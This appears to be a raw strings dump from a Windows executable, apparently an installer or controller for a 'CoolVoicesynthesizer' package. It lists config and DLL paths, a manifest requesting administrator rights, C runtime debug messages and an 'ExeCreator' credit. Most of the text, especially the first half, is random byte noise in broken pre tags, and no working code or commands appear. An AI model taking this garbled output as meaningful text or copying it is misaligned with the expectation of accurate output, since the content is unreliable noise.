A/</pre><pre>%DvIP</pre><pre>.XW\}P</pre><pre>n<.NV</pre><pre>%U?w!</pre><pre>-zc}ZK</pre><pre>.PY0D!</pre><pre>.Fank</pre><pre>SG:%U</pre><pre>%C"-k</pre><pre>?}.Bh</pre><pre>g%F]~7ZBw</pre><pre>dO.fa</pre><pre>%D!ov</pre><pre>.UJJ6</pre><pre>LkEY</pre><pre>.Ps5KC</pre><pre>)LBA;/;%F</pre><pre>"&%x`*</pre><pre>3*tg.Tl</pre><pre>V.UEg</pre><pre>-.ca,</pre><pre>Ki.jLu.r(~</pre><pre>.VE}`0</pre><pre>J}]%s</pre><pre>2U%UDs</pre><pre>8@Y/%X</pre><pre>ME.%u</pre><pre>Tj]).iT1jdF</pre><pre>.ZzLK#0</pre><pre>tJ%ch</pre><pre>#&.Iz</pre><pre>E-YxM}</pre><pre>HF.ge?</pre><pre>W/{.Dl</pre><pre>D^g|%S</pre><pre>.nFl#</pre><pre>@=.YM</pre><pre>E.Cwp</pre><pre>V.Rmrw</pre><pre>_57oe%c</pre><pre>5/.ob</pre><pre>o%uO^</pre><pre>!.gQS</pre><pre>.qLtX</pre><pre>Xßc</pre><pre>.qyI4z H</pre><pre>bFsQl</pre><pre>r.LK6</pre><pre>pKþ</pre><pre>B-E}SGD;</pre><pre>mEXE</pre><pre>?.txc@</pre><pre>ftpH</pre><pre>zEm.vKNp</pre><pre>%s^T'</pre><pre>w @J1.jd</pre><pre>.qkf[u</pre><pre>/!(D.XL</pre><pre>e%8S1</pre><pre>S<%xyj</pre><pre>.Qv90</pre><pre>Yu.Nj</pre><pre>7.UHc</pre><pre>.rz]&</pre><pre>1%C{ ?</pre><pre>.pCD#</pre><pre>$&.zr</pre><pre>.cq h</pre><pre>O%d<Q><pre>t.MQ7</pre><pre>st.yr1[</pre><pre>%fl}T</pre><pre>vUdp$</pre><pre>%8XZ'</pre><pre>I'%U#</pre><pre>PB-t&/%dsAd</pre><pre>@ei.qK</pre><pre>.fX9Uw</pre><pre>C\.Cf</pre><pre>E.lLK{</pre><pre>Hb.My</pre><pre>vW.TK</pre><pre>.zcQ~`_</pre><pre>%.kv"</pre><pre>P%U6p</pre><pre>LM.ma</pre><pre>.Lkz"g</pre><pre>:]1.RW</pre><pre>\CoolVoicesynthesizer\config\controler.ini</pre><pre>\CoolVoicesynthesizer\config\copyfile.ini</pre><pre>\CoolVoicesynthesizer\config\defaultupdate.ini</pre><pre>\CoolVoicesynthesizer\config\softset.ini</pre><pre>e.ini</pre><pre>\CoolVoicesynthesizer\config\sysconfig.ini</pre><pre>\CoolVoicesynthesizer\exe\CoolFixe.dbf</pre><pre>\CoolVoicesynthesizer\exe\CoolFixe.dll</pre><pre>\CoolVoicesynthesizer\exe\CoolFixe64.dbf</pre><pre>\CoolVoicesynthesizer\exe\CoolFixe64.dll</pre><pre>\CoolVoicesynthesizer\exe\mmcSer.exe</pre><pre>\CoolVoicesynthesizer\exe\mmcSer64.exe</pre><pre><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"></compatibility></assembly></pre><pre><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS></pre><pre><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS></pre><pre><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS></pre><pre>accKeyboardShortcut</pre><pre>ekernel32.dll</pre><pre>mscoree.dll</pre><pre>KERNEL32.DLL</pre><pre>f:\dd\vctools\crt_bld\self_x86\crt\src\strlwr.c</pre><pre>f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c</pre><pre>_CrtDbgReport: String too long or IO Error</pre><pre>wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")</pre><pre>Debug %s!</pre><pre>Program: %s%s%s%s%s%s%s%s%s%s%s%s</pre><pre>memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)</pre><pre>wcscpy_s(szExeName, 260, L"<program name unknown>")</program></pre><pre>__crtMessageWindowW</pre><pre>Ff:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c</pre><pre>strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")</pre><pre>%s(%d) : %s</pre><pre>wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")</pre><pre>_VCrtDbgReportW</pre><pre>WUSER32.DLL</pre><pre>f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c</pre><pre>f:\dd\vctools\crt_bld\self_x86\crt\src\tcscat_s.inl</pre><pre>f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c</pre><pre>shell.Explorer.2</pre><pre>.The file (%s) aleady exists.</pre><pre>Web site</pre><pre>All Files (*.*)</pre><pre>No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.</pre><pre>Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.</pre><pre>Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.</pre><pre>#Unable to load mail system support.</pre><pre>Based on ExeCreator written by Kaushal Malhotra (malhotrakaushal@mantraonline.com)</pre><pre>1, 0, 0, 0</pre><pre>DeepSoundcontroller.exe</pre></Q></pre></pre></NC></pre></pre></pre></pre></pre></pre>